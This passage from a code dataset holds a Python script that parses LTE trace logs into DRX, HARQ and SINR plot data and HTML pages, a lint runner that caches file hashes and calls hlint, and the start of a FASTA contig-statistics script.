1.75\\n\")\n\n m = re.search(\"UpUlMacPeCiUlL1Harqfdbk2DlIndS?\", line)\n if m:\n UlL1Harqfdbk = 1\n\n m = re.search(\"dlHarqValid(\\s| = )1\", line)\n if m:\n dlHarqValid = 1\n\n m = re.search(\"nrOfTb(\\s| = )([-0-9]+)\", line)\n if m:\n nrOfTb = int(m.group(2))\n\n m = re.search(\"detectedHarqIndication(\\s| = )([-0-9]+)\", line)\n if (dlHarqValid == 1) and (UlL1Harqfdbk == 1) and (m):\n if (int(m.group(2)) == 0): #NACK/NACK\n if (nrOfTb == 1):\n 
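# NOTE (readability summary; the mapping is taken from this block's own inline comments): detectedHarqIndication encodes the per-transport-block HARQ feedback as 0=NACK/NACK, 1=NACK/ACK, 2=ACK/NACK, 3=ACK/ACK, 4=DTX; ACK samples are logged as \" 1.5\" and NACK samples as \" 1.75\".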
ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n elif (nrOfTb == 2):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n elif (int(m.group(2)) == 1): #NACK/ACK\n if (nrOfTb == 1):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (nrOfTb == 2):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (int(m.group(2)) == 2): #ACK/NACK\n if (nrOfTb == 1):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (nrOfTb == 2):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n elif (int(m.group(2)) == 3): #ACK/ACK\n if (nrOfTb == 1):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (nrOfTb == 2):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (int(m.group(2)) == 4): #DTX\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n dlHarqValid = 0\n\n #############################################################################\n # Get Scheduling Request in UL\n #############################################################################\n\n m = re.search(\"UpUlMacPeCiUlL1Measrprt2UlIndS? \", line)\n if m:\n ulMeas2Ul = 1\n\n m = re.search(\"pucchSrReport \", line) #nrOfPucchSrReports and pucchSrReportList\n if (ulMeas2Ul == 1) and (m):\n PUCCHSRFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n\n m = re.search(\"nrOfPucchSrReports(\\\\s| = )([-0-9]+)\", line)\n if (ulMeas2Ul == 1) and m:\n if (int(m.group(2)) != 0):\n PUCCHSRFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n\n #############################################################################\n # Get TBS in DL\n ############################################################################\n\n m = re.search(\"UpDlMacPeCiDlUeAllocIndS? \", line)\n if m:\n dlAllocInd = 1\n\n m = re.search(\"tbSizeInBytes(\\\\s| = )([-0-9]+)\", line)\n if (dlAllocInd == 1) and (m):\n tbsDl = 1 # presence flag only; the matched tbSizeInBytes value itself is not logged\n\n if(tbsDl > 0):\n DLTBSFILE.write(str(sfnTimePrint) + \" \" + str(tbsDl) + \"\\n\")\n\n #############################################################################\n # Get NEW and RETX data in DL\n #############################################################################\n\n m = re.search(\"newDataFlag(\\\\s| = )(1|true)\", line)\n if (dlAllocInd == 1) and m:\n DLNEWFILE.write(str(sfnTimePrint) + \" 1\" + \"\\n\")\n\n m = re.search(\"newDataFlag(\\\\s| = )(0|false)\", line)\n if (dlAllocInd == 1) and m:\n DLRETXFILE.write(str(sfnTimePrint) + \" 0\" + \"\\n\")\n\n #############################################################################\n # Get TBS in UL\n #############################################################################\n\n m = re.search(\"UpUlMacPeCiUlUeAllocIndS? 
\", line)\n if m:\n ulAllocInd = 1\n\n m = re.search(\"newDataFlag(\\s| = )(1|true)\", line)\n if (ulAllocInd == 1) and m:\n ulNewTx = 1\n\n m = re.search(\"newDataFlag(\\s| = )(0|false)\", line)\n if (ulAllocInd == 1) and m:\n ulRetx = 1\n\n m = re.search(\"tbs(\\s|=){([-0-9]+)\", line)\n if (ulAllocInd == 1) and m:\n tbsUl = (int(m.group(2))/8)\n if(ulNewTx):\n ULNEWTBSFILE.write(str(sfnTimePrint) + \" \" + str(tbsUl) + \"\\n\")\n ulNewTx = 0\n if(ulRetx):\n ULRETXTBSFILE.write(str(sfnTimePrint) + \" \" + str(tbsUl) + \"\\n\")\n ulRetx = 0\n\n #############################################################################\n # Get rxpower and SINR for PUSCH when not DTX\n #############################################################################\n\n m = re.search(\"isDtx(\\s| = )(1|true)\", line)\n if m:\n dtxSample = 1\n\n m = re.search(\"isDtx(\\s| = )(0|false)\", line)\n if m:\n validSample = 1\n\n m = re.search(\"rxPowerReport(\\s| = )([-0-9]+)\", line)\n if(validSample == 1) and m:\n rxpowerpusch = int(m.group(2))/10\n RXPOWERPUSCHFILE.write(str(sfnTimePrint) + \" \" + str(rxpowerpusch) + \"\\n\")\n\n m = re.search(\"sinr(\\s| = )([-0-9]+)\", line)\n if(validSample == 1) and m:\n ulsinr = int(m.group(2))/10\n ULSINRFILE.write(str(sfnTimePrint) + \" \" + str(ulsinr) + \"\\n\")\n\n #############################################################################\n # Get DRX UL\n #############################################################################\n\n m = re.search(\"drxActive=([0-1])\", line)\n if m:\n if(oldStateUl != m.group(1)):\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(m.group(1)) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n oldStateUl = m.group(1)\n ulDrxTraceAvailable = 1\n\n m = re.search(\"shortDrxCycleTime=([0-9]+)\", line)\n m1 = re.search(\"shortDrxCycleTime=-1\", line)\n if m:\n drxShortUl = 3\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n elif m1:\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n drxShortUl = 2\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n\n m = re.search(\"IATime=([0-9]+)\", line) or re.search(\"inactivityTime=([0-9]+)\", line)\n m1 = re.search(\"IATime=-1\", line) or re.search(\"inactivityTime=-1\", line)\n if m:\n if oldInactivityUl != m.group(1):\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n oldInactivityUl = m.group(1)\n inactivityUl = 5\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n elif m1:\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n inactivityUl = 4\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n\n #############################################################################\n # Get DRX DL\n #############################################################################\n\n m = re.search(\"SCTime=([0-9]+)\", line)\n m1 = re.search(\"SCTime=-1\", line)\n if m:\n if(oldShortCycleTimer != m.group(1)):\n oldShortCycleTimer = 
int(m.group(1))\n drxShort = 3\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n elif m1:\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n drxShort = 2\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n m = re.search(\"ONType=([3-4])\", line)\n if m:\n onType = int(m.group(1))/2\n DRXDLSKIPONDURATION.write(str(sfnTimePrint) + \" \" + str(onType) + \"\\n\")\n\n m = re.search(\"c=([0-1]) r=\", line)\n if m:\n if oldState != m.group(1):\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(m.group(1)) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n oldState = m.group(1)\n dlDrxTraceAvailable = 1\n\n m = re.search(\"IATime=([0-9]+)\", line)\n m1 = re.search(\"IATime=-1\", line)\n if m:\n if(oldInactivity != m.group(1)):\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n oldInactivity = m.group(1)\n inactivity = 5\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n elif m1:\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n inactivity = 4\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n m = re.search(\"UpcDlMacCeFiUeDrxUpdateIndS?\", line)\n if m:\n DRXUPDATEFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n\n #############################################################################\n # CR2525 Information\n #############################################################################\n\n m = re.search(\"nrOfDtxInARowDl=([0-9]+)\", line)\n if m:\n dtx = ((int(m.group(1))/10) + 1)\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n m = re.search(\"dtxCnt(\\s|=)([-0-9]+)\", line)\n if m:\n dtx = ((int(m.group(2))/10) + 1)\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n #################################################################################\n # EVENTS from the UL Calendar function\n #################################################################################\n ####\n #### Read from EM event, move to Validation list\n ####\n\n m = re.search(\"DRX_WAKUP_LONGCYCLE\", line)\n if m:\n if drxLongCycle <= 0:\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxLongCycle = 1\n\n m = re.search(\"DRX_WAKEUP_SHORTCYCLE\", line)\n if m:\n if drxShortCycle <= 0:\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxShortCycle = 1\n\n m = re.search(\"ULMACCE_LISTMGROBS_SR\", line)\n if m:\n srReceived = 0\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 
0\\n\")\n srReceived = 1\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n srReceived = 0\n\n ####\n #### Write to EM events, move to Non validation list\n ####\n\n m = re.search(\"DRX_INACTIVITY_STOP\", line)\n if m:\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" -0.5\\n\")\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n\n m = re.search(\"UE_OUTOFSYNC\", line)\n if m:\n if(drxLongCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxLongCycle = 0\n\n if(drxShortCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxShortCycle = 0\n\n m = re.search(\"DRX_SLEEP_SHORTCYCLE\", line) or re.search(\"DRX_SLEEP_LONGCYCLE\", line)\n if m:\n if(drxShortCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxShortCycle = 0\n\n if(drxLongCycle == 1):\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n drxLongCycle = 0\n srReceived = 0\n DRXFILE.write(str(sfnTimePrint) + \" \" + str(drxLongCycle) + \" \" + str(drxShortCycle) + \" \" + str(srReceived) + \" 0\\n\")\n\n m = re.search(\"DC_DT=\\[([0-9]+) ([0-9]+)]\", line)\n if m:\n DC = m.group(1)\n DT = m.group(2)\n DC_DT.write(str(sfnTimePrint) + \" \" + str(DC) + \".\" + str(DT) + \"\\n\")\n\n m = re.search(\"newDrxConfigIndex(\\s|=)([0-9]+)\", line)\n if m:\n newDrxConfigIndex = float(m.group(2))/100\n NEWDRXCONFIGINDEX.write(str(sfnTimePrint) + \" \" + str(newDrxConfigIndex) + \"\\n\")\n\n m = re.search(\"newLongDrxCycle(\\s|=)([0-9]+)\", line)\n if m:\n newLongDrxCycle = float(m.group(2))/100\n NEWLONGDRXCYCLE.write(str(sfnTimePrint) + \" \" + str(newLongDrxCycle) + \"\\n\")\n\n m = re.search(\"newDrxStartOffset(\\s|=)([0-9]+)\", line)\n if m:\n newDrxStartOffset = float(m.group(2))/100\n NEWDRXSTARTOFFSET.write(str(sfnTimePrint) + \" \" + str(newDrxStartOffset) + \"\\n\")\n\n ############################################################################\n\n for line in f: # read the parsed log file\n m = re.search(\"0x[0-9abcdef]+=\", line) or re.search(\"^\\[[-:. 0-9]+\\]\", line)\n if m: # example \"0x5051e916=\"\"\n noOfTraceBlocks+=1\n if(begin == 0):\n begin = 1\n traceblock.append(line)\n else:\n checkTraceblock()\n del traceblock[:]\n traceblock.append(line)\n else:\n if(begin == 1):\n traceblock.append(line)\n else:\n checkTraceblock()\n\n #####################################\n ## Calculating DRX Sleep Ratio\n #####################################\n DRXDLFILE = open(dirname + os.sep + match + \"_drx_dl.txt\", 'r')\n\n prevLine = None\n pts = []\n ON = 0.0\n ALL = 0.0\n prevRow0 = None\n firstLine = 1\n\n for line in DRXDLFILE:\n row = line.split()\n if firstLine:\n prevRow0 = int(row[0])\n firstLine = 0\n if (line != prevLine) and (line not in pts):\n pts.append(line)\n if (int(row[0]) != prevRow0):\n ALL += int(row[0]) - prevRow0\n prevRow0 = int(row[0])\n if (int(row[1]) == 1):\n ON+=1.0\n\n print(\" Sfn Time Wrap handled! 
Number of sfn wraps: \" + str(sfnWrap) + \"\\n\")\n\n totTti = (lastTti - firstTti)/1000.0\n print(\" Trace length: \" + str(totTti) + \" seconds\\n\")\n print(\" Missed TTIs: \" + str(missedTti) + \"\\n\")\n print(\" Time gap of more than 10 ms exists! \\n\")\n print(\" DRX Sleep Ratio is: %.2f%%\\n\" % (((ALL-ON)/ALL)*100))\n\n if((ulDrxTraceAvailable == 0) or (dlDrxTraceAvailable == 0)):\n print(\" UL and/or DL DRX traces are missing from the logfile. The plot information might not be enough to get a proper graph!\\n\")\n print(\" UL = \" + str(ulDrxTraceAvailable) + \", DL = \" + str(dlDrxTraceAvailable))\n\n f.close()\n RXPOWERPUSCHFILE.close()\n ULNEWTBSFILE.close()\n ULRETXTBSFILE.close()\n DLNEWFILE.close()\n DLRETXFILE.close()\n DLTBSFILE.close()\n PUCCHSRFILE.close()\n ULSINRFILE.close()\n DRXDLFILE.close()\n DRXULFILE.close()\n DRXFILE.close()\n ULHARQACKFILE.close()\n ULHARQNACKFILE.close()\n DRXUPDATEFILE.close()\n DRXDLSKIPONDURATION.close()\n TIMESTAMP.close()\n NEWDRXCONFIGINDEX.close()\n NEWDRXSTARTOFFSET.close()\n NEWLONGDRXCYCLE.close()\n DC_DT.close()\n INCONSISTENCY.close()\n\n'''***************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************'''\n\nfor match in matches:\n if match in FoldersExist:\n continue\n\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n DRXDLFILE = open(dirname + os.sep + match + \"_drx_dl.txt\", 'r')\n DRXFILE = open(dirname + os.sep + match + \"_rx_event_ul.txt\", 'r')\n DRXULFILE = open(dirname + os.sep + match + \"_drx_ul.txt\", 'r')\n RXPOWERPUSCHFILE = open(dirname + os.sep + match + \"_rxpower_pusch.txt\", 'r')\n ULNEWTBSFILE = open(dirname + os.sep + match + \"_ultbs_new.txt\", 'r')\n ULRETXTBSFILE = open(dirname + os.sep + match + \"_ultbs_retx.txt\", 'r')\n DLNEWFILE = open(dirname + os.sep + match + \"_dl_new.txt\", 'r')\n DLRETXFILE = open(dirname + os.sep + match + \"_dl_retx.txt\", 'r')\n DLTBSFILE = open(dirname + os.sep + match + \"_dltbs.txt\", 'r')\n PUCCHSRFILE = open(dirname + os.sep + match + \"_sr.txt\", 'r')\n ULSINRFILE = open(dirname + os.sep + match + \"_ulsinr.txt\", 'r')\n ULHARQACKFILE = open(dirname + os.sep + match + \"_ulharqack.txt\", 'r')\n ULHARQNACKFILE = open(dirname + os.sep + match + \"_ulharqnack.txt\", 'r')\n DRXUPDATEFILE = open(dirname + os.sep + match + \"_drxupdateind.txt\", 'r')\n DRXDLSKIPONDURATION = open(dirname + os.sep + match + \"_drxdl_skip_onduration.txt\", 'r')\n TIMESTAMP = open(dirname + os.sep + match + \"_timestamp.txt\", 'r')\n NEWDRXCONFIGINDEX = open(dirname + os.sep + match + \"_new_drx_config_index.txt\", 'r')\n NEWDRXSTARTOFFSET = open(dirname + os.sep + match + \"_new_drx_start_offset.txt\", 'r')\n NEWLONGDRXCYCLE = open(dirname + os.sep + match + \"_new_long_drx_cycle.txt\", 'r')\n DC_DT = open(dirname + os.sep + match + \"_dc_dt.txt\", 'r')\n INCONSISTENCY = open(dirname + os.sep + match + \"_inconsistency.txt\", 'r')\n\n\n first = next(TIMESTAMP).decode()\n 
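# NOTE: the seek(-1024, 2) below jumps to at most 1 KiB before end-of-file so that readlines()[-1] cheaply returns the last timestamp line; this assumes the file holds at least 1024 bytes. A defensive variant (illustrative sketch, not in the original script):\n #     TIMESTAMP.seek(0, 2)\n #     TIMESTAMP.seek(max(TIMESTAMP.tell() - 1024, 0))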
TIMESTAMP.seek(-1024, 2)\n last = TIMESTAMP.readlines()[-1].decode()\n\n row = first.split()\n firstSfn = int(row[0])\n\n row = last.split()\n lastSfn = int(row[0])\n\n nrOfSfn = lastSfn - firstSfn\n\n TIMESTAMP.seek(0)\n\n maxSfnPerPage = 8000\n nrOfFile = math.ceil(nrOfSfn/float(maxSfnPerPage))\n totalFiles = int(nrOfFile)\n print('totalfiles',totalFiles)\n \n print(firstSfn, lastSfn, first, last)\n last_pos1 = TIMESTAMP.tell()\n last_pos2 = DRXDLFILE.tell()\n last_pos3 = DRXULFILE.tell()\n last_pos4 = RXPOWERPUSCHFILE.tell()\n last_pos5 = ULNEWTBSFILE.tell()\n last_pos6 = ULRETXTBSFILE.tell()\n last_pos7 = DLNEWFILE.tell()\n last_pos8 = DLRETXFILE.tell()\n last_pos9 = DLTBSFILE.tell()\n last_pos10 = PUCCHSRFILE.tell()\n last_pos11 = ULSINRFILE.tell()\n last_pos12 = ULHARQACKFILE.tell()\n last_pos13 = ULHARQNACKFILE.tell()\n last_pos14 = DRXUPDATEFILE.tell()\n last_pos15 = DRXDLSKIPONDURATION.tell()\n last_pos16 = NEWDRXCONFIGINDEX.tell()\n last_pos17 = NEWDRXSTARTOFFSET.tell()\n last_pos18 = NEWLONGDRXCYCLE.tell()\n last_pos19 = DC_DT.tell()\n last_pos20 = INCONSISTENCY.tell()\n last_pos21 = DRXFILE.tell()\n\n if nrOfFile > 1:\n print(' Number of data points exceed limit for a single HTML page.\\n')\n print(' Multiple HTML pages are created. Only the first will be launched automatically.\\n')\n print(' Refer to ' + dirname + ' to manually launch desired HTML page.')\n\n print (\"\\n***************************************************************************************\\n\")\n n = 0\n\n firstfile = 1\n pts = []\n x1 = []\n y1 = []\n y2 = []\n y3 = []\n y4 = []\n y5 = []\n timestamp = []\n\n while nrOfFile > 0:\n n+=1\n minRange = firstSfn\n maxRange = 0\n pg = dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \"_\" + str(int(n)) + \".html\"\n f = open(pg, 'w')\n nrOfFile-=1\n\n f.write('''\n <!doctype html>\n <html>\n <head>\n <title>''' + 'DRX Plot For UE: ' + str(match) +'''\n \n\n \n\n \n \n

Note: A greyed out trace is disabled. To show information for a trace, please click on it to enable it.

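<!-- Annotation (not part of the original page): the plot rendered here shows the per-UE series written out above; the Range X1/X2 inputs restrict the visible sfn window, and the prev/next buttons step through the generated HTML pages. -->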
\n \n \n \n \n \n ''')\n i = totalFiles\n f.write('''\n ''')\n f.write('''\n \n
\n
\n Range X1 (Minimum Sfn: ''' + str(minRange) + '''):\n \n Range X2 (Maximum Sfn: ''' + str(maxRange) + '''):\n \n
\n
\n \n ''')\n\n\n totalFiles = 0\n for file in os.listdir(dirname):\n if file.endswith(\".html\"):\n totalFiles+=1\n\n nrOfFile = totalFiles\n n = 0\n while nrOfFile > 0:\n n+=1\n pg = dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \"_\" + str(int(n)) + \".html\"\n f = open(pg, 'a')\n nrOfFile-=1\n\n if (n-1) is not 0:\n f.write('''
\n \n
\n
\n \n ''')\n if (n+1) <= totalFiles:\n f.write('''
\n >\" class=\"next\">\n
\n
\n \n \n ''')\n\n f.close()\n if firstfile:\n new = 2 # open in a new tab, if possible\n url = pg\n webbrowser.open(url,new=new)\n firstfile = 0\n\n RXPOWERPUSCHFILE.close()\n ULNEWTBSFILE.close()\n ULRETXTBSFILE.close()\n DLNEWFILE.close()\n DLRETXFILE.close()\n DLTBSFILE.close()\n PUCCHSRFILE.close()\n ULSINRFILE.close()\n DRXDLFILE.close()\n DRXULFILE.close()\n DRXFILE.close()\n ULHARQACKFILE.close()\n ULHARQNACKFILE.close()\n DRXUPDATEFILE.close()\n DRXDLSKIPONDURATION.close()\n TIMESTAMP.close()\n NEWDRXCONFIGINDEX.close()\n NEWDRXSTARTOFFSET.close()\n NEWLONGDRXCYCLE.close()\n DC_DT.close()\n INCONSISTENCY.close()\n","sub_path":"drx_old-b631c30b4be09f6e9d7b01b630739a20.py","file_name":"drx_old-b631c30b4be09f6e9d7b01b630739a20.py","file_ext":"py","file_size_in_byte":77123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"131575883","text":"#!/usr/bin/env python\n\nimport hashlib\nimport os\nimport pickle\nimport subprocess\nimport sys\n\nfrom core import *\nimport generic_lint\n\n\n\n# Constants\n\ndirs_to_ignore = [\".stack-work\", \".build-work\"]\ntmp_dir = \"./.build-work/tmp/\"\ncache_file = tmp_dir + \"lint_cache.pickle\"\n\n\n\n# Implementation\n\ndef perform_lint(dirs):\n # Load the set of files known to be good\n known_good_hashes = set()\n if os.path.isfile(cache_file):\n known_good_hashes = pickle.load(open(cache_file, \"rb\"))\n\n # Lint any files that are not known to be good\n all_files = sum(map(files_in_dir, dirs), [])\n allowed_files = filter(is_allowed_file, all_files)\n code_files = filter(is_code_file, allowed_files)\n success = True\n for file in code_files:\n # Determine the file's hash\n with open(file, \"rb\") as f:\n hasher = hashlib.sha1()\n hasher.update(f.read())\n file_hash = hasher.hexdigest()\n\n # If the file isn't known to be good, then lint it\n if not (file_hash in known_good_hashes):\n file_success = lint_file(file)\n success = success and file_success\n if file_success:\n known_good_hashes.add(file_hash)\n\n # Write the updated set of known good files to the cache\n mkdir_p(tmp_dir)\n pickle.dump(known_good_hashes, open(cache_file, \"wb\"))\n\n return success\n\ndef lint_file(file):\n success = generic_lint.run_for(file)\n if is_haskell_file(file):\n cmd = [\"hlint\", \"--no-summary\", \"--hint=tools/lint/HLint\", file]\n hlint_exit = subprocess.call(cmd)\n hlint_success = (hlint_exit == 0)\n success = success and hlint_success\n\n return success\n\ndef is_allowed_file(file):\n path_components = file.split(\"/\")\n if len(path_components) > 1:\n return not (path_components[1] in dirs_to_ignore)\n else:\n return True\n\nif __name__ == \"__main__\":\n success = perform_lint([\".\"])\n sys.exit(None if success else 1)\n","sub_path":"tools/lint/full_lint.py","file_name":"full_lint.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"568228102","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport os.path\nimport argparse\nimport re\nimport string\nimport logging\nimport warnings\n\n## simpleFastaStats.py takes a single fasta-formatted DNA/RNA text file and\n## outputs contig count, average contig length, N50 contig lengths, maximum contig length, and cumulative contig length\n\n## Function: A closure for file extension checking\n\ndef ext_check(expected_ext, openner):\n def extension(filename):\n if not filename.lower().endswith(expected_ext):\n raise ValueError()\n return openner(filename)\n 
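# NOTE (usage sketch, mirroring how this script wires it up below):\n #     parser.add_argument(\"filename\", type=ext_check('.fasta', argparse.FileType('r')), nargs='+')\n # ext_check returns the inner function as a closure, so argparse calls it once per\n # filename and rejects any path without the expected extension before opening it.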
return extension\n\n## Function: Filename extractor from filepath\ndef getIsolateID(filePathString):\n\tsplitStr = re.split(pattern='/', string=filePathString)\n\tfileNameIdx = len(splitStr) - 1\n\tisolateString = re.split(pattern='\\.', string=splitStr[fileNameIdx])\n\tif(len(isolateString[0]) < 10):\n\t\tisolateString = re.split(pattern='\\.', string=splitStr[0])\n\treturn isolateString[0]\n\n## Function: Checks existence of --outDir\ndef readable_dir(prospective_dir):\n\tif not os.path.isdir(prospective_dir):\n \t\traise argparse.ArgumentTypeError(\"readable_dir:{0} is not a valid path\".format(prospective_dir))\n\tif os.access(prospective_dir, os.R_OK):\n\t\tif( not prospective_dir.endswith(\"/\") ):\n\t\t\tprospective_dir = prospective_dir + \"/\"\n\t\treturn prospective_dir\n\telse:\n\t\traise argparse.ArgumentTypeError(\"readable_dir:{0} is not a readable dir\".format(prospective_dir))\n\n\nparser = argparse.ArgumentParser(description='compare average contig and contig counts among multiple .fasta, move lower quality assemblies to Hel', usage=\"multiFastaContigAvgJudgement.py filepath/input.assembly*.fasta --minLength 500(default) --format [brief(default)|verbose|tsv|csv]\")\n\nparser.add_argument(\"filename\",type=ext_check('.fasta', argparse.FileType('r')), nargs='+')\n\n## output folder\nparser.add_argument('--outDir', '-D', type=readable_dir, required=True, action='store')\n\n## minimum contig length\nparser.add_argument(\"--minLength\", '-min', default='500', type=int)\n\nparser.add_argument(\"--format\", default='brief', type = lambda s : s.lower(), choices=['tsv', 'csv', 'brief', 'verbose', 'c', 's', 'b', 'v'])\n\n## arrays of dict type variables\n#GenomeDrafts = []\n#GenomeContigs = []\n\ninFileName = []\n\ndraftContigs = []\ndraftGenome = {}\ncontigLengths = {}\nidCount = 0\ncontigID = \"\"\ncontigStr = \"\" \n\ncontigCount = []\nmaxContig = []\ncontigN50 = []\ndrLength = 0\ndraftLength = []\navgContig = []\n\nargs = parser.parse_args()\n\nhelHeim = args.outDir\n\nintMinLen = args.minLength\n\nidxFile = 0\n\n##### Begin logging #####\n\nlogger = logging.getLogger(\"multiFastaContigAvgJudgement.py\")\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nif(len(args.filename) < 2):\n\tprint(\"Input Error: Two or more .fasta files required!\")\n\tsys.exit(1)\n\n##### Begin multiple input file loop #####\n\nfor filehandle in args.filename:\n\tinFileName.append(getIsolateID(filehandle.name))\n\t\n\t## First inner loop to read input file lines\n\n\tfor line in filehandle:\n\t\tif(re.search(r'^>', line)):\n\t\t\tif(idCount > 0):\n\t\t\t\tdraftGenome[contigID] = contigStr\n\t\t\t\tcontigID = \"\"\n\t\t\t\tcontigStr = \"\"\n\t\t\tcontigID = line.strip()\n\t\t\tif(re.search(r'\\(paired\\)', contigID)):\n\t\t\t\tcontigID = contigID.replace('_(paired)', '')\n\t\t\tif(re.search('R1_001_', contigID)):\n\t\t\t\tcontigID = contigID.replace('R1_001_', '')\n\t\t\tdraftContigs.append(contigID)\n\t\t\tidCount = idCount + 1\n\t\t\t#print(contigID)\n\t\telif(re.search(r'^(A|T|G|C|U|N)+', line)):\n\t\t\tcontigStr = contigStr + line.strip()\n\n\n\tdraftGenome[contigID] = contigStr\n\n\t### End first inner loop\n\n\t## Close input file\n\tfilehandle.close()\n\n\t### Second inner loop to populate dict of contig lengths\n\n\tfor contigKey 